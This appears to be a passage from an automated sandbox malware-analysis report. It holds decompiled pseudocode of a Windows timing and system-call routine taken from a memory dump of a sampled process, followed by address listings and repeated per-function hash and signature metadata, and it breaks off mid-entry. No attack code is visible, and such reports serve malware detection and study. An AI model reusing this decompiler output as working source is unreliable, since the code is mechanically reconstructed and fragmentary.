				signed int* _t113;
				signed int* _t114;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t122;
				signed int _t127;
				intOrPtr* _t128;
				signed int _t131;
				signed char _t134;
				signed int _t136;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr _t143;
				signed char _t144;
				signed short _t145;
				signed char _t146;
				intOrPtr* _t147;
				intOrPtr _t148;
				void* _t150;
				char _t152;
				signed int _t153;
				signed char _t154;

				_v8 =  *0xa9d360 ^ _t153;
				_t144 =  *0x7ffe03c6;
				_v25 = _t144;
				_t128 = _a4;
				_v44 = _t128;
				if((_t144 & 0x00000001) == 0) {
					L54:
					_push(0);
					_push( &_v100);
					E009E9810();
					 *_t128 = _v100;
					 *(_t128 + 4) = _v96;
					goto L20;
				} else {
					do {
						_t148 =  *0x7ffe03b8;
						_t134 =  *0x7FFE03BC;
						_t146 =  *0x7FFE03BC;
						_v60 = _t148;
						_v76 = _t134;
					} while (_t148 !=  *0x7ffe03b8 || _t134 != _t146);
					_t128 = _v44;
					if((_t144 & 0x00000002) != 0) {
						_t147 =  *0xa96908; // 0x0
						_v68 = _t147;
						if(_t147 == 0) {
							goto L54;
						} else {
							goto L22;
						}
						while(1) {
							L22:
							_t101 =  *_t147;
							_v32 = _t101;
							if(_t101 == 0) {
								break;
							}
							if(_t144 >= 0) {
								if((_t144 & 0x00000020) == 0) {
									if((_t144 & 0x00000010) != 0) {
										asm("mfence");
									}
								} else {
									asm("lfence");
								}
								asm("rdtsc");
							} else {
								asm("rdtscp");
								_v72 = _t134;
							}
							_v52 = _t101;
							_v84 =  *((intOrPtr*)(_t147 + 8));
							_v64 =  *((intOrPtr*)(_t147 + 0x10));
							_v80 =  *((intOrPtr*)(_t147 + 0x14));
							_t105 = E009ECF90(_t144, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t146 = _t144;
							E009ECF90(_v52, 0,  *((intOrPtr*)(_t147 + 0xc)), 0);
							_t150 = _t105 + _t144;
							_t144 = _v25;
							asm("adc edi, 0x0");
							_v40 = _t150 + _v64;
							_t147 = _v68;
							asm("adc edi, [ebp-0x4c]");
							_v36 = _t146;
							if( *_t147 != _v32) {
								continue;
							} else {
								_t128 = _v44;
								_t147 = _v60;
								L19:
								_t144 = _v36;
								asm("adc edx, [ebp-0x48]");
								 *_t128 = E009ED340(_v40 + _t147,  *0x7ffe03c7 & 0x000000ff, _t144);
								 *(_t128 + 4) = _t144;
								L20:
								return E009EB640(1, _t128, _v8 ^ _t153, _t144, _t146, _t147);
							}
						}
						_t128 = _v44;
						goto L54;
					}
					_v56 = 0xffffffff;
					if( *((intOrPtr*)( *[fs:0x18] + 0xfdc)) == 0) {
						_t136 = 0x14c;
						L14:
						_t112 = _t136 & 0x0000ffff;
						L15:
						if(_t112 == 0xaa64) {
							_t113 =  &_v40;
							_v32 = _t113;
							_t138 = _v32;
							asm("int 0x81");
							 *_t138 = _t113;
							 *(_t138 + 4) = _t144;
							if((_t144 & 0x00000040) == 0) {
								goto L19;
							}
							_t114 =  &_v92;
							_v32 = _t114;
							_t139 = _v32;
							asm("int 0x81");
							 *_t139 = _t114;
							 *(_t139 + 4) = _t144;
							_t144 = _v88;
							if(((_t144 ^ _v36) & 0x00000001) != 0) {
								goto L19;
							}
							_t112 = _v92;
							L18:
							_v40 = _t112;
							_v36 = _t144;
							goto L19;
						}
						if(_t144 >= 0) {
							if((_t144 & 0x00000020) == 0) {
								if((_t144 & 0x00000010) != 0) {
									asm("mfence");
								}
							} else {
								asm("lfence");
							}
							asm("rdtsc");
						} else {
							asm("rdtscp");
						}
						goto L18;
					}
					_t117 =  *[fs:0x18];
					_t143 =  *((intOrPtr*)(_t117 + 0xfdc));
					if(_t143 < 0) {
						_t117 = _t117 + _t143;
					}
					if(_t117 ==  *((intOrPtr*)(_t117 + 0x18))) {
						_t118 =  *((intOrPtr*)(_t117 + 0xe38));
					} else {
						_t118 =  *((intOrPtr*)(_t117 + 0x14d0));
					}
					if(_t118 == 0 ||  *((short*)(_t118 + 0x22)) == 0) {
						L34:
						_v48 = 0x10;
						_push( &_v48);
						_push(0x10);
						_t146 =  &_v24;
						_push(_t146);
						_push(4);
						_push( &_v56);
						_push(0xb5);
						_t122 = E009EAA90();
						if(_t122 == 0xc0000023) {
							_t152 = _v48;
							E009ED000(_t152);
							_t146 = _t154;
							_push( &_v48);
							_push(_t152);
							_push(_t146);
							_push(4);
							_push( &_v56);
							_push(0xb5);
							_t122 = E009EAA90();
							_t147 = _v60;
						}
						if(_t122 < 0) {
							_t112 = _v104;
							_t144 = _v25;
							goto L15;
						} else {
							_t145 =  *_t146;
							_t136 = 0;
							if(_t145 == 0) {
								L43:
								_t144 = _v25;
								goto L14;
							}
							_t131 = 0;
							do {
								if((_t145 & 0x00040000) != 0) {
									_t136 = _t145 & 0x0000ffff;
								}
								_t145 =  *(_t146 + 4 + _t131 * 4);
								_t131 = _t131 + 1;
							} while (_t145 != 0);
							_t128 = _v44;
							goto L43;
						}
					} else {
						_t127 =  *(_t118 + 0x20) & 0x0000ffff;
						if(_t127 == 0) {
							goto L34;
						}
						_t136 = _t127;
						goto L14;
					}
				}
			}






















































                                                                                              0x009d6a6f
                                                                                              0x009d6a72
                                                                                              0x009d6a78
                                                                                              0x009d6a7c
                                                                                              0x009d6a7f
                                                                                              0x009d6a87
                                                                                              0x00a18049
                                                                                              0x00a18049
                                                                                              0x00a1804e
                                                                                              0x00a1804f
                                                                                              0x00a18057
                                                                                              0x00a1805c
                                                                                              0x00000000
                                                                                              0x009d6a8d
                                                                                              0x009d6a92
                                                                                              0x009d6a92
                                                                                              0x009d6a94
                                                                                              0x009d6a99
                                                                                              0x009d6a9c
                                                                                              0x009d6a9f
                                                                                              0x009d6aa2
                                                                                              0x009d6aaa
                                                                                              0x009d6ab0
                                                                                              0x00a17eae
                                                                                              0x00a17eb4
                                                                                              0x00a17eb9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00a17ebf
                                                                                              0x00a17ebf
                                                                                              0x00a17ebf
                                                                                              0x00a17ec1
                                                                                              0x00a17ec6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00a17ece
                                                                                              0x00a17edb
                                                                                              0x00a17ee5
                                                                                              0x00a17ee7
                                                                                              0x00a17ee7
                                                                                              0x00a17edd
                                                                                              0x00a17edd
                                                                                              0x00a17edd
                                                                                              0x00a17eea
                                                                                              0x00a17ed0
                                                                                              0x00a17ed0
                                                                                              0x00a17ed3
                                                                                              0x00a17ed3
                                                                                              0x00a17eec
                                                                                              0x00a17ef8
                                                                                              0x00a17f00
                                                                                              0x00a17f07
                                                                                              0x00a17f0a
                                                                                              0x00a17f19
                                                                                              0x00a17f1b
                                                                                              0x00a17f23
                                                                                              0x00a17f25
                                                                                              0x00a17f28
                                                                                              0x00a17f2e
                                                                                              0x00a17f31
                                                                                              0x00a17f34
                                                                                              0x00a17f37
                                                                                              0x00a17f3c
                                                                                              0x00000000
                                                                                              0x00a17f3e
                                                                                              0x00a17f3e
                                                                                              0x00a17f41
                                                                                              0x009d6b35
                                                                                              0x009d6b38
                                                                                              0x009d6b44
                                                                                              0x009d6b4c
                                                                                              0x009d6b4e
                                                                                              0x009d6b51
                                                                                              0x009d6b69
                                                                                              0x009d6b69
                                                                                              0x00a17f3c
                                                                                              0x00a18046
                                                                                              0x00000000
                                                                                              0x00a18046
                                                                                              0x009d6abc
                                                                                              0x009d6aca
                                                                                              0x00a17f49
                                                                                              0x009d6b13
                                                                                              0x009d6b13
                                                                                              0x009d6b16
                                                                                              0x009d6b1e
                                                                                              0x00a17fe7
                                                                                              0x00a17fea
                                                                                              0x00a17fed
                                                                                              0x00a17ff0
                                                                                              0x00a17ff2
                                                                                              0x00a17ff4
                                                                                              0x00a17ffa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00a18000
                                                                                              0x00a18003
                                                                                              0x00a18006
                                                                                              0x00a18009
                                                                                              0x00a1800b
                                                                                              0x00a1800d
                                                                                              0x00a18010
                                                                                              0x00a1801f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00a18025
                                                                                              0x009d6b2f
                                                                                              0x009d6b2f
                                                                                              0x009d6b32
                                                                                              0x00000000
                                                                                              0x009d6b32
                                                                                              0x009d6b26
                                                                                              0x00a18030
                                                                                              0x00a1803a
                                                                                              0x00a1803c
                                                                                              0x00a1803c
                                                                                              0x00a18032
                                                                                              0x00a18032
                                                                                              0x00a18032
                                                                                              0x00a1803f
                                                                                              0x009d6b2c
                                                                                              0x009d6b2c
                                                                                              0x009d6b2c
                                                                                              0x00000000
                                                                                              0x009d6b26
                                                                                              0x009d6ad0
                                                                                              0x009d6ad6
                                                                                              0x009d6ade
                                                                                              0x009d6ae0
                                                                                              0x009d6ae0
                                                                                              0x009d6ae5
                                                                                              0x00a17f53
                                                                                              0x009d6aeb
                                                                                              0x009d6aeb
                                                                                              0x009d6aeb
                                                                                              0x009d6af3
                                                                                              0x00a17f5e
                                                                                              0x00a17f61
                                                                                              0x00a17f68
                                                                                              0x00a17f69
                                                                                              0x00a17f6b
                                                                                              0x00a17f70
                                                                                              0x00a17f71
                                                                                              0x00a17f76
                                                                                              0x00a17f77
                                                                                              0x00a17f7c
                                                                                              0x00a17f86
                                                                                              0x00a17f88
                                                                                              0x00a17f8d
                                                                                              0x00a17f92
                                                                                              0x00a17f97
                                                                                              0x00a17f98
                                                                                              0x00a17f99
                                                                                              0x00a17f9a
                                                                                              0x00a17f9f
                                                                                              0x00a17fa0
                                                                                              0x00a17fa5
                                                                                              0x00a17faa
                                                                                              0x00a17faa
                                                                                              0x00a17faf
                                                                                              0x00a17fdc
                                                                                              0x00a17fdf
                                                                                              0x00000000
                                                                                              0x00a17fb1
                                                                                              0x00a17fb1
                                                                                              0x00a17fb3
                                                                                              0x00a17fb8
                                                                                              0x00a17fd4
                                                                                              0x00a17fd4
                                                                                              0x00000000
                                                                                              0x00a17fd4
                                                                                              0x00a17fba
                                                                                              0x00a17fbc
                                                                                              0x00a17fc2
                                                                                              0x00a17fc4
                                                                                              0x00a17fc4
                                                                                              0x00a17fc7
                                                                                              0x00a17fcb
                                                                                              0x00a17fcc
                                                                                              0x00a17fd1
                                                                                              0x00000000
                                                                                              0x00a17fd1
                                                                                              0x009d6b04
                                                                                              0x009d6b04
                                                                                              0x009d6b0b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x009d6b11
                                                                                              0x00000000
                                                                                              0x009d6b11
                                                                                              0x009d6af3

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aab41aaf917f1cb78781b9694ac550deb3c6b42e88cc3e80ac7395d92fb78615
                                                                                              • Instruction ID: 1bafbe126266e232c08c9a5047a5223b51dd4855f218fce107ccbf0f23a05147
                                                                                              • Opcode Fuzzy Hash: aab41aaf917f1cb78781b9694ac550deb3c6b42e88cc3e80ac7395d92fb78615
                                                                                              • Instruction Fuzzy Hash: 12816C71A042199FDB10CF99C981BEEBBF5EF48340F14806AE944EB381D739AD45CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E98A0 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 710bccead7c11efadac44113b9e2505d13d3b8412b8cc965488395a3a835fff1
                                                                                              • Instruction ID: aeac999c855c0cff2a687767ca43e2f6c4ac131c77c61d453e4e90232ce4979f
                                                                                              • Opcode Fuzzy Hash: 710bccead7c11efadac44113b9e2505d13d3b8412b8cc965488395a3a835fff1
                                                                                              • Instruction Fuzzy Hash: 9490026130210802D21261594414616004AD7D1385F92C022E2814555D86658953F272
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9820 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 20ca8f08f5902c978e13fe7613ecb79f0cd2c0fcfa8c7a424508fb9562b531d1
                                                                                              • Instruction ID: 4ac03f627d537facc2bb71599af9c8863abb3fcec53da02da0009e8dc1e8ba30
                                                                                              • Opcode Fuzzy Hash: 20ca8f08f5902c978e13fe7613ecb79f0cd2c0fcfa8c7a424508fb9562b531d1
                                                                                              • Instruction Fuzzy Hash: C790027124210802D25171594404616004AA7D0381F92C022A1814554E86958A56FBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009EB040 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7b457930c38ac62f80dae470dea8716a7dd486716c7b5773e6f08f43f1355df9
                                                                                              • Instruction ID: b47a330c9340e05bd3dd8eeeb27ba990b954daa934fc5241af00198ed2447d74
                                                                                              • Opcode Fuzzy Hash: 7b457930c38ac62f80dae470dea8716a7dd486716c7b5773e6f08f43f1355df9
                                                                                              • Instruction Fuzzy Hash: 2A9002A1602244434650B15948044165056A7E1341392C131A1844560C86A88855F3A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E99D0 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0e4770445ec343a56c6cac2a25970d0dba9e1e3131dd06ae4773256cc242c24a
                                                                                              • Instruction ID: 43e16df748604086472062b78cf2c76314b5dc6251e74c226970368f59208ab4
                                                                                              • Opcode Fuzzy Hash: 0e4770445ec343a56c6cac2a25970d0dba9e1e3131dd06ae4773256cc242c24a
                                                                                              • Instruction Fuzzy Hash: B89002A121210442D21461594404716008697E1341F52C022A3544554CC5698C61B265
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E95F0 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 347110b16ee662161c2205a44bee4f652c38faa9c7ace7539b9deb307d0b4d1e
                                                                                              • Instruction ID: 6eb0525aea0b99411b2f2276116ad131e97fa305ce00567283ea858e486263d1
                                                                                              • Opcode Fuzzy Hash: 347110b16ee662161c2205a44bee4f652c38faa9c7ace7539b9deb307d0b4d1e
                                                                                              • Instruction Fuzzy Hash: BF90027120210C02D21461594804696004697D0341F52C021A7414655E96A58891B271
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009EAD30 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3b942098d2cc59745c054087571e011592d9cc0bb427d26da1af0241a9d53652
                                                                                              • Instruction ID: 6324b660889ba1157ea38760340c07de2bfbdd933bfeff02fbfd91839d7c557e
                                                                                              • Opcode Fuzzy Hash: 3b942098d2cc59745c054087571e011592d9cc0bb427d26da1af0241a9d53652
                                                                                              • Instruction Fuzzy Hash: 86900271A06104129250715948146564047A7E0781B56C021A1904554C89948A55B3E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: df56c26fdf46ced362519c109ab8a3116abf0b8f961bfb09b7141a9e852b69c1
                                                                                              • Instruction ID: cdc07e4ec7894ee9ccd83acd7e5c4f9e12bede9e227eecc2f476eda2db70c71c
                                                                                              • Opcode Fuzzy Hash: df56c26fdf46ced362519c109ab8a3116abf0b8f961bfb09b7141a9e852b69c1
                                                                                              • Instruction Fuzzy Hash: 139002E1202244924610A2598404B1A454697E0341B52C026E2444560CC5658851F275
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9950 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2be00a5ff65f47ff877c23aca9e02439740ec4587f842f7e3e6986c8dbd7e01c
                                                                                              • Instruction ID: bbe8ec16f2641b1f5ba482c220748c613d1d0998e9b212218139b40eab834c9c
                                                                                              • Opcode Fuzzy Hash: 2be00a5ff65f47ff877c23aca9e02439740ec4587f842f7e3e6986c8dbd7e01c
                                                                                              • Instruction Fuzzy Hash: 1B9002A120250803D25065594804617004697D0342F52C021A3454555E8A698C51B275
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9560 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c33435c7cd923df7f46defdd780beb6152c6ec71ced5d3eed2d755c607b32749
                                                                                              • Instruction ID: b15307398d4915a0d58ef9d306a53f0ed4cada058b332a189561ebace4050065
                                                                                              • Opcode Fuzzy Hash: c33435c7cd923df7f46defdd780beb6152c6ec71ced5d3eed2d755c607b32749
                                                                                              • Instruction Fuzzy Hash: 98900265222104020255A559060451B0486A7D6391392C025F2806590CC6618865B361
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9A80 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a66fc1601d0db221b98d60713aaba12973a20e6a5d31c40fbf36631327f1be80
                                                                                              • Instruction ID: d6f8fc13d54e902ae5cd0759026f411f703929ec8ca2f6e83294aa5c075742ec
                                                                                              • Opcode Fuzzy Hash: a66fc1601d0db221b98d60713aaba12973a20e6a5d31c40fbf36631327f1be80
                                                                                              • Instruction Fuzzy Hash: B890026120254842D25062594804B1F414697E1342F92C029A5546554CC9558855B761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E96D0 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b600c45fb2fd28f737146734794acbf656c3438b6fbefbe0b290a70e6413b28c
                                                                                              • Instruction ID: df4cf6c1908d3595aa54a6a7311f5fd0d69dc81cf16a1000ac84de98ac1e43c6
                                                                                              • Opcode Fuzzy Hash: b600c45fb2fd28f737146734794acbf656c3438b6fbefbe0b290a70e6413b28c
                                                                                              • Instruction Fuzzy Hash: C690027120210C42D21061594404B56004697E0341F52C026A1514654D8655C851B661
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9A10 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4a16d186ac38f26566db8f6912f8c1a6e29149e4270a912bdb52e92dfbb42e5f
                                                                                              • Instruction ID: 8be998371bc48655ab458f638a98c9fd8851512bcc5e1545067ab2d229e8fce8
                                                                                              • Opcode Fuzzy Hash: 4a16d186ac38f26566db8f6912f8c1a6e29149e4270a912bdb52e92dfbb42e5f
                                                                                              • Instruction Fuzzy Hash: 3E90027120250802D21061594808757004697D0342F52C021A6554555E86A5C891B671
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9610 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6ef4d4906569ca0bfffa15d4587ab96a56797f7eb567f8ff4fa1aec95d622f48
                                                                                              • Instruction ID: 55f5f8b29fe5554f4968624715866b5fc52fe2bb6ee28a601f3ef629884145d9
                                                                                              • Opcode Fuzzy Hash: 6ef4d4906569ca0bfffa15d4587ab96a56797f7eb567f8ff4fa1aec95d622f48
                                                                                              • Instruction Fuzzy Hash: 5090027160610C02D26071594414756004697D0341F52C021A1414654D87958A55B7E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9650 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 88e4d6f17c5d11d3e0833bd72cd6d4d98728945eaea85ffc784e4cb289818bb6
                                                                                              • Instruction ID: 9c1b4a0f612818490bd434bfc5168e8f33f598210fa763624661474c3c83b452
                                                                                              • Opcode Fuzzy Hash: 88e4d6f17c5d11d3e0833bd72cd6d4d98728945eaea85ffc784e4cb289818bb6
                                                                                              • Instruction Fuzzy Hash: 0590027120614C42D25071594404A56005697D0345F52C021A1454694D96658D55F7A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009EA3B0 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 673f3dcc4f016333f8577b7dfe3d33a3f94e76846004b7f766073d7a6c5ec199
                                                                                              • Instruction ID: 3758a3722c049f6fc6218dbc87f73fe681e37d7bd5faeb12afc43453ee2cfc37
                                                                                              • Opcode Fuzzy Hash: 673f3dcc4f016333f8577b7dfe3d33a3f94e76846004b7f766073d7a6c5ec199
                                                                                              • Instruction Fuzzy Hash: 0390027120254402D2507159844461B5046A7E0341F52C421E1815554C86558856F361
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009EA710 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 80b946f3791774c2d83480c06bb867e1d66a47727d2e485696c70073ee4ac627
                                                                                              • Instruction ID: 71db3515e091ee84daa0ed1e5cca095cc19418cb0ec725dc407dd9dfb79f958b
                                                                                              • Opcode Fuzzy Hash: 80b946f3791774c2d83480c06bb867e1d66a47727d2e485696c70073ee4ac627
                                                                                              • Instruction Fuzzy Hash: 53900271302104529610A6995804A5A414697F0341B52D025A5404554C85948861B261
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9B00 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 471da39c101b2ce1769580951445e411cc9d863337789e4541d5cf60064ac9a8
                                                                                              • Instruction ID: 6bfb758fd5ea66dfdb9c08033a1ce2653e556ede798fed9d9c0aad7fd6f147da
                                                                                              • Opcode Fuzzy Hash: 471da39c101b2ce1769580951445e411cc9d863337789e4541d5cf60064ac9a8
                                                                                              • Instruction Fuzzy Hash: 8B90026124210C02D250715984147170047D7D0741F52C021A1414554D86568965B7F1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9730 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5e4e2e72f9d310d6942d828a0f72bc10c0ff04c47e6d34a95eefe6daaaa08837
                                                                                              • Instruction ID: e378ecda4d19f2284e862618b6ea04ecd9245359fb8d1dcd7d79a9537d40f67c
                                                                                              • Opcode Fuzzy Hash: 5e4e2e72f9d310d6942d828a0f72bc10c0ff04c47e6d34a95eefe6daaaa08837
